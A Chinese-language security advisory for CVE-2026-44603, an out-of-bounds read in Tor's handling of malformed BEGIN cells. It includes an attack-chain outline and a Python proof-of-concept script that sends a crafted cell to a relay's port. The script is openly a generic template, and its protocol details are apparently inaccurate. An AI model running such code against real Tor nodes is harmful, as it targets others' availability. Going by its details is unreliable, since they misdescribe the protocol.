CVE-2026-44603 CVSS 3.7 低危

CVE-2026-44603 Tor 越界读取漏洞

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-44603

漏洞类型

越界读取

CVSS评分

3.7 低危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Tor

漏洞概述

Tor 0.4.9.7 之前的版本存在一个安全漏洞，编号为 CVE-2026-44603（TROVE-2026-007）。该漏洞是由于在处理网络连接时，未能正确验证畸形的 BEGIN cell，导致发生单字节的越界读取。尽管攻击无需认证且通过网络进行，但由于利用复杂度较高（AC:H），其CVSS评分为3.7（低危），主要影响系统的可用性。

技术细节

该漏洞位于 Tor 的核心网络协议处理逻辑中。当 Tor 节点接收到一个特制的、格式错误的 BEGIN cell 时，解析代码未能对数据长度进行严格的边界检查。这导致程序在读取数据时，访问了超出预定缓冲区一个字节的内存空间。这种越界读取行为（Out-of-Bounds Read）通常会导致程序崩溃（DoS），在特定情况下也可能泄露内存中的敏感信息（如密钥片段或指针），尽管CVSS向量显示机密性影响为无（C:N）。由于攻击向量为网络（AV:N）且无需用户交互，任何能向目标Tor节点发送数据包的攻击者均可尝试触发此漏洞。

攻击链分析

STEP 1

侦察

攻击者扫描网络寻找开放的Tor节点端口（默认为9001或9050）。

STEP 2

武器化

攻击者构造一个畸形的BEGIN cell数据包，该数据包包含特定的长度或格式，旨在触发解析逻辑中的越界读取。

STEP 3

交付

攻击者通过建立的TCP连接，将恶意构造的BEGIN cell发送给目标Tor节点。

STEP 4

利用

目标Tor节点解析该cell时，执行越界读取指令，导致内存访问错误。

STEP 5

影响

导致Tor进程崩溃（拒绝服务），或在极少数情况下泄露内存数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import struct

# Conceptual Proof of Concept for CVE-2026-44603
# Demonstrates sending a malformed cell structure to Tor
# Note: Actual exploitation requires precise protocol manipulation.

def exploit(target_ip, target_port):
    try:
        # Establish TCP connection to Tor ORPort
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((target_ip, target_port))
        
        # Construct a malformed Cell
        # Tor Cell structure: Circuit ID (2/4 bytes) + Command (1 byte) + Payload (Length specified)
        # To trigger OOB read, we manipulate the parsing of the BEGIN cell.
        
        circuit_id = 0x00000000 # Example Circuit ID
        cmd_begin = 1 # BEGIN command
        
        # Malformed payload designed to trigger the off-by-one read
        # The exact payload depends on the specific parsing logic of Tor < 0.4.9.7
        payload = b'\x00' * 509  # Example length near boundary
        
        # Pack the header (assuming version 3 or 4 link protocol)
        # This is a generic template
        packet = struct.pack('!IB', circuit_id, cmd_begin) + payload
        
        s.send(packet)
        print(f"[+] Malformed packet sent to {target_ip}:{target_port}")
        
        response = s.recv(1024)
        if not response:
            print("[-] Connection closed (Possible Crash)")
        else:
            print("[+] Received response")
            
        s.close()
    except Exception as e:
        print(f"Error: {e}")

# Usage: exploit("127.0.0.1", 9001)

影响范围

Tor < 0.4.9.7

防御指南

临时缓解措施

建议立即检查并更新Tor软件版本。如果无法立即升级，请配置网络防火墙规则，严格限制对Tor控制端口和OR端口的访问来源，并监控异常的流量模式或进程崩溃日志。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表